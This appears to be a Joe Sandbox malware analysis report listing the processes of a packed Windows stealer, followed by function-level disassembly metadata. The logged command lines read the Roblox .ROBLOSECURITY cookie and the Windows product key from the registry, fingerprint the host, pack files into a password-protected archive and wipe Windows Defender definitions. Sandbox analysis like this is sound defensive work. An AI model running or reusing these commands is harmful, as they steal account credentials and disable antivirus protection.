Show Windows behavior

Target ID:	45
Start time:	20:22:10
Start date:	03/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff6a7b40000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: cmd.exePID: 8184, Parent PID: 5260

General

Target ID:	46
Start time:	20:22:10
Start date:	03/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "getmac"
Imagebase:	0x7ff6a7b40000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	20:22:10
Start date:	03/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	20:22:10
Start date:	03/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	20:22:10
Start date:	03/08/2024
Path:	C:\Windows\System32\getmac.exe
Wow64 process (32bit):	false
Commandline:	getmac
Imagebase:	0x7ff648c40000
File size:	90'112 bytes
MD5 hash:	7D4B72DFF5B8E98DD1351A401E402C33
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	20:22:10
Start date:	03/08/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff6af5c0000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	20:22:11
Start date:	03/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff6a7b40000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7412, Parent PID: 7684

General

Target ID:	52
Start time:	20:22:11
Start date:	03/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	20:22:11
Start date:	03/08/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff6af5c0000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	20:22:11
Start date:	03/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff6a7b40000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7312, Parent PID: 7448

General

Target ID:	55
Start time:	20:22:11
Start date:	03/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	20:22:11
Start date:	03/08/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff6af5c0000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	20:22:12
Start date:	03/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff6a7b40000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7700, Parent PID: 7712

General

Target ID:	58
Start time:	20:22:12
Start date:	03/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	59
Start time:	20:22:12
Start date:	03/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Imagebase:	0x7ff6a7b40000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	60
Start time:	20:22:12
Start date:	03/08/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff6af5c0000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	61
Start time:	20:22:12
Start date:	03/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	62
Start time:	20:22:12
Start date:	03/08/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	63
Start time:	20:22:13
Start date:	03/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Imagebase:	0x7ff6a7b40000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	64
Start time:	20:22:13
Start date:	03/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	65
Start time:	20:22:13
Start date:	03/08/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	66
Start time:	20:22:16
Start date:	03/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe a -r -hp"adrik123adi" "C:\Users\user\AppData\Local\Temp\QzNtG.zip" *"
Imagebase:	0x7ff6a7b40000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	67
Start time:	20:22:16
Start date:	03/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	68
Start time:	20:22:16
Start date:	03/08/2024
Path:	C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe a -r -hp"adrik123adi" "C:\Users\user\AppData\Local\Temp\QzNtG.zip" *
Imagebase:	0x7ff7f7e80000
File size:	630'736 bytes
MD5 hash:	9C223575AE5B9544BC3D69AC6364F75E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	70
Start time:	20:22:18
Start date:	03/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic os get Caption"
Imagebase:	0x7ff6a7b40000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	71
Start time:	20:22:18
Start date:	03/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	72
Start time:	20:22:18
Start date:	03/08/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic os get Caption
Imagebase:	0x7ff6e8540000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	73
Start time:	20:22:19
Start date:	03/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
Imagebase:	0x7ff6a7b40000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	74
Start time:	20:22:19
Start date:	03/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	75
Start time:	20:22:20
Start date:	03/08/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic computersystem get totalphysicalmemory
Imagebase:	0x7ff6e8540000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	76
Start time:	20:22:21
Start date:	03/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Imagebase:	0x7ff6a7b40000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	77
Start time:	20:22:21
Start date:	03/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	78
Start time:	20:22:21
Start date:	03/08/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic csproduct get uuid
Imagebase:	0x7ff6e8540000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	79
Start time:	20:22:22
Start date:	03/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
Imagebase:	0x7ff6a7b40000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	80
Start time:	20:22:22
Start date:	03/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	81
Start time:	20:22:22
Start date:	03/08/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	82
Start time:	20:22:23
Start date:	03/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Imagebase:	0x7ff6a7b40000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	83
Start time:	20:22:23
Start date:	03/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	84
Start time:	20:22:23
Start date:	03/08/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic path win32_VideoController get name
Imagebase:	0x7ff6e8540000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	85
Start time:	20:22:24
Start date:	03/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
Imagebase:	0x7ff6a7b40000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	86
Start time:	20:22:24
Start date:	03/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	87
Start time:	20:22:24
Start date:	03/08/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	88
Start time:	20:22:25
Start date:	03/08/2024
Path:	C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Imagebase:	0x7ff687d40000
File size:	468'120 bytes
MD5 hash:	B3676839B2EE96983F9ED735CD044159
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	11.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	18.2%
Total number of Nodes:	2000
Total number of Limit Nodes:	32

Executed Functions

Function 00007FF73AE36370 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 334
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_daylight.LIBCMT ref: 00007FF73AE363B5

Part of subcall function 00007FF73AE35D08: _invalid_parameter_noinfo.LIBCMT ref: 00007FF73AE35D1C

Part of subcall function 00007FF73AE2AF0C: RtlDeleteBoundaryDescriptor.NTDLL(?,?,?,00007FF73AE33392,?,?,?,00007FF73AE333CF,?,?,00000000,00007FF73AE33895,?,?,00000000,00007FF73AE337C7), ref: 00007FF73AE2AF22
Part of subcall function 00007FF73AE2AF0C: GetLastError.KERNEL32(?,?,?,00007FF73AE33392,?,?,?,00007FF73AE333CF,?,?,00000000,00007FF73AE33895,?,?,00000000,00007FF73AE337C7), ref: 00007FF73AE2AF2C

Part of subcall function 00007FF73AE2AEC4: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF73AE2AEA3,?,?,?,?,?,00007FF73AE230CC), ref: 00007FF73AE2AECD
Part of subcall function 00007FF73AE2AEC4: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF73AE2AEA3,?,?,?,?,?,00007FF73AE230CC), ref: 00007FF73AE2AEF2

_get_daylight.LIBCMT ref: 00007FF73AE363A4

Part of subcall function 00007FF73AE35D68: _invalid_parameter_noinfo.LIBCMT ref: 00007FF73AE35D7C

_get_daylight.LIBCMT ref: 00007FF73AE3661A
_get_daylight.LIBCMT ref: 00007FF73AE3662B
_get_daylight.LIBCMT ref: 00007FF73AE3663C
GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF73AE3687C), ref: 00007FF73AE36663

Strings

Eastern Summer Time, xrefs: 00007FF73AE36721
Eastern Standard Time, xrefs: 00007FF73AE36709

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$BoundaryCurrentDeleteDescriptorErrorFeatureInformationLastPresentProcessProcessorTimeZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 3714727158-239921721
Opcode ID: 54e1ccf0b1e099ab2aef5fd1d20d70d6c7b19d4e9a74b58f9fc53268ba567377
Instruction ID: eeacdfc7d36a17e1146b1cdeb97eeb046fffc1062d1d8f8cb94d3ab427a5a274
Opcode Fuzzy Hash: 54e1ccf0b1e099ab2aef5fd1d20d70d6c7b19d4e9a74b58f9fc53268ba567377
Instruction Fuzzy Hash: 37D1C26EE4825266FB60BF35D4531BAA3A1EF84B84FC04175DA0D47AC5DF3EE441A360

Function 00007FF73AE372BC Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF73AE36FF0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF73AE37031
Part of subcall function 00007FF73AE36FF0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF73AE370AF
Part of subcall function 00007FF73AE36FF0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF73AE37100

CreateFileW.KERNELBASE ref: 00007FF73AE373C2
CreateFileW.KERNEL32 ref: 00007FF73AE37412
GetLastError.KERNEL32 ref: 00007FF73AE37442
GetFileType.KERNELBASE ref: 00007FF73AE37457
GetLastError.KERNEL32 ref: 00007FF73AE37461
CloseHandle.KERNEL32 ref: 00007FF73AE37494
CloseHandle.KERNEL32 ref: 00007FF73AE375F7
CreateFileW.KERNEL32 ref: 00007FF73AE3762C
GetLastError.KERNEL32 ref: 00007FF73AE3763B

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: d1d4f06f2925cf98ba43065425f03779d4007acc0884ea13a9d80746d18551ee
Instruction ID: 8b8805d2d46d94d028e4b92193d2591972852dae45492f2206e1985f5be5368a
Opcode Fuzzy Hash: d1d4f06f2925cf98ba43065425f03779d4007acc0884ea13a9d80746d18551ee
Instruction Fuzzy Hash: 0FC1F23AF64A42A5FB10FF68C4922AC7761FB49BA8B804265DE2E573D4CF39D051E710

Function 00007FF73AE17950 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 141
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathW.KERNEL32(00000000,?,00000000,00000000,?,00007FF73AE1154F), ref: 00007FF73AE179E7

Part of subcall function 00007FF73AE17B60: GetEnvironmentVariableW.KERNEL32(00007FF73AE13A1F), ref: 00007FF73AE17B9A
Part of subcall function 00007FF73AE17B60: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF73AE17BB7

Part of subcall function 00007FF73AE27DEC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF73AE27E05

SetEnvironmentVariableW.KERNEL32 ref: 00007FF73AE17AA1

Part of subcall function 00007FF73AE12B30: MessageBoxW.USER32 ref: 00007FF73AE12C05

Strings

TMP, xrefs: 00007FF73AE1798A, 00007FF73AE17A49, 00007FF73AE17AD7
_MEI%d, xrefs: 00007FF73AE179F5
TMP, xrefs: 00007FF73AE179B0
LOADER: Failed to set the TMP environment variable., xrefs: 00007FF73AE179CA

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: Environment$Variable$ExpandMessagePathStringsTemp_invalid_parameter_noinfo
String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
API String ID: 3752271684-1116378104
Opcode ID: 7055df51aa8baa9cea4d529d496e5c2017cf8e1c57129ce6875fbf4dd1c833c4
Instruction ID: 6211cd37f64dc97ff5f084d4dfca716672d606488915e7183716ea1fbf44d9d1
Opcode Fuzzy Hash: 7055df51aa8baa9cea4d529d496e5c2017cf8e1c57129ce6875fbf4dd1c833c4
Instruction Fuzzy Hash: C651C119F8926321F954B762E8532BAE2515F8AFC0FC454F5ED0E4B7D2EE2CE501B620

Function 00007FF73AE365EC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_daylight.LIBCMT ref: 00007FF73AE3661A

Part of subcall function 00007FF73AE35D68: _invalid_parameter_noinfo.LIBCMT ref: 00007FF73AE35D7C

_get_daylight.LIBCMT ref: 00007FF73AE3662B

Part of subcall function 00007FF73AE35D08: _invalid_parameter_noinfo.LIBCMT ref: 00007FF73AE35D1C

_get_daylight.LIBCMT ref: 00007FF73AE3663C

Part of subcall function 00007FF73AE35D38: _invalid_parameter_noinfo.LIBCMT ref: 00007FF73AE35D4C

Part of subcall function 00007FF73AE2AF0C: RtlDeleteBoundaryDescriptor.NTDLL(?,?,?,00007FF73AE33392,?,?,?,00007FF73AE333CF,?,?,00000000,00007FF73AE33895,?,?,00000000,00007FF73AE337C7), ref: 00007FF73AE2AF22
Part of subcall function 00007FF73AE2AF0C: GetLastError.KERNEL32(?,?,?,00007FF73AE33392,?,?,?,00007FF73AE333CF,?,?,00000000,00007FF73AE33895,?,?,00000000,00007FF73AE337C7), ref: 00007FF73AE2AF2C

GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF73AE3687C), ref: 00007FF73AE36663

Strings

Eastern Summer Time, xrefs: 00007FF73AE36721
Eastern Standard Time, xrefs: 00007FF73AE36709

Memory Dump Source

